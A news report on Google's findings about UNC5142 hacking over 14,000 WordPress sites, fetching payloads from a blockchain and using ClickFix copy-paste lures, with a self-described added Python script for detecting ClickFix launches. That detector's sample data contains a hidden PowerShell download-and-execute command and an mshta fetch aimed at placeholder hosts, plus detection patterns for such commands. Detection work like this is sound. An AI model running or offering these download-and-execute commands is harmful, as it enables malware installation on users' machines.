- UNC5142 hacked over 14,000 WordPress sites to distribute malware
- Malware payloads were retrieved from the blockchain, making the campaign more resilient and takedowns harder.
- ClickFix tricks deceived users into executing malicious commands
More than 14,000 WordPress websites have been hacked and used as launching pads for malware distribution, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said it was the work of UNC5142, a relatively new threat actor that emerged in late 2023 and shut down operations in late July 2025.
It’s not yet clear if the hiatus is temporary, permanent, or if the group has simply opted for different techniques. Given its previous successes in compromising websites and deploying malware, Google believes the group has just improved its obfuscation techniques and is still operating in the wild.
Blockchain and ClickFix
As part of the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites, injecting malicious code into plugin files, theme files and, in some cases, the WordPress database itself.
These sites received a multi-stage JavaScript downloader called CLEARSHORT, which enabled the malware distribution. The downloader retrieved its second-stage payload from a public blockchain, most often the BNB chain.
Using a blockchain is attractive, the researchers found, because it improves resilience and makes takedowns more difficult:
“The use of blockchain technology for much of UNC5142’s infrastructure and operation increases its resilience to detection and takedown efforts,” the report said.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic than traditional web traffic due to the lack of use of traditional URLs. Input and withdrawal operations are also hampered given the immutability of blockchain.”
Using data stored on the public blockchain, the malware then pulled a CLEARSHORT landing page from an external server. This landing page served the ClickFix social engineering tactic – prompting users to copy and paste a command into the Run dialog on Windows (or the Terminal app on a Mac) that ultimately downloaded the malware.
Landing pages were typically hosted on a Cloudflare .dev page, the report said, and were retrieved in encrypted form.
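As an added illustration (this is not code from the article or from GTIG's report), the following Python script shows how a defender might spot the ClickFix step described above in endpoint telemetry: a command pasted into the Windows Run dialog is launched as a child of explorer.exe, so the heuristic flags interpreters spawned from explorer.exe whose command line also fetches something remotely, hides its window, or decodes an encoded payload. The process-creation records, hostnames and file paths are all constructed for this example, and the indicator lists are assumptions drawn from general ClickFix reporting rather than from this article.

```python
"""Heuristic ClickFix detector over constructed process-creation records.

Added example, not part of the original article. The record shape is a
simplified version of the fields an EDR or Sysmon process-creation event
carries (parent image, image, command line). Every sample event below is
constructed; the domain example.invalid is a placeholder.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Interpreters and download utilities commonly seen in copy/paste lures
# (assumption: generic list, not taken from the article).
INTERPRETER_RE = re.compile(
    r"(?i)\b(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin)(\.exe)?\b"
)

# Signs that the command reaches out to the network, hides its window,
# or carries an encoded/evaluated payload.
SUSPICIOUS_RE = re.compile(
    r"(?i)https?://|\s-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression"
    r"|frombase64string|\s-w(indowstyle)?\s+hidden"
)


def is_run_dialog_child(ev: ProcEvent) -> bool:
    """A command typed into Win+R (the Run dialog) is spawned by explorer.exe."""
    return ev.parent_image.lower().endswith(r"\explorer.exe")


def score_event(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like a ClickFix execution (empty if none)."""
    reasons = []
    if not is_run_dialog_child(ev):
        return reasons
    if INTERPRETER_RE.search(ev.command_line):
        reasons.append("interpreter or download utility launched from explorer.exe")
    if SUSPICIOUS_RE.search(ev.command_line):
        reasons.append("remote fetch, hidden window or encoded payload in command line")
    return reasons


def detect_clickfix(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Flag events that satisfy both heuristics; one alone is too noisy."""
    return [(ev, r) for ev in events if len(r := score_event(ev)) >= 2]


# Constructed sample telemetry: two ClickFix-like launches, three benign or
# out-of-scope ones (a scheduled task under svchost.exe is not a Run-dialog child).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm http://lure.example.invalid/verify)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\notes.txt"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -File C:\\Scripts\\inventory.ps1 http://intranet.example.invalid/api"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta https://lure.example.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd /c dir"),
]


def flagged_images(events: list[ProcEvent] = SAMPLE_EVENTS) -> list[str]:
    """Convenience wrapper returning just the image names of flagged events."""
    return [ev.image.rsplit("\\", 1)[-1].lower() for ev, _ in detect_clickfix(events)]


if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {ev.image}: {ev.command_line}")
        for r in reasons:
            print(f"  - {r}")
```

Requiring both heuristics keeps ordinary Run-dialog use (`cmd /c dir`, opening Notepad) quiet while still catching the hidden-window PowerShell and mshta launches typical of the lure; in production the parent check would be widened to other places a pasted command can land, such as the File Explorer address bar, and the alert would be enriched with the user and the URL seen in the command line.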
Via Hacker News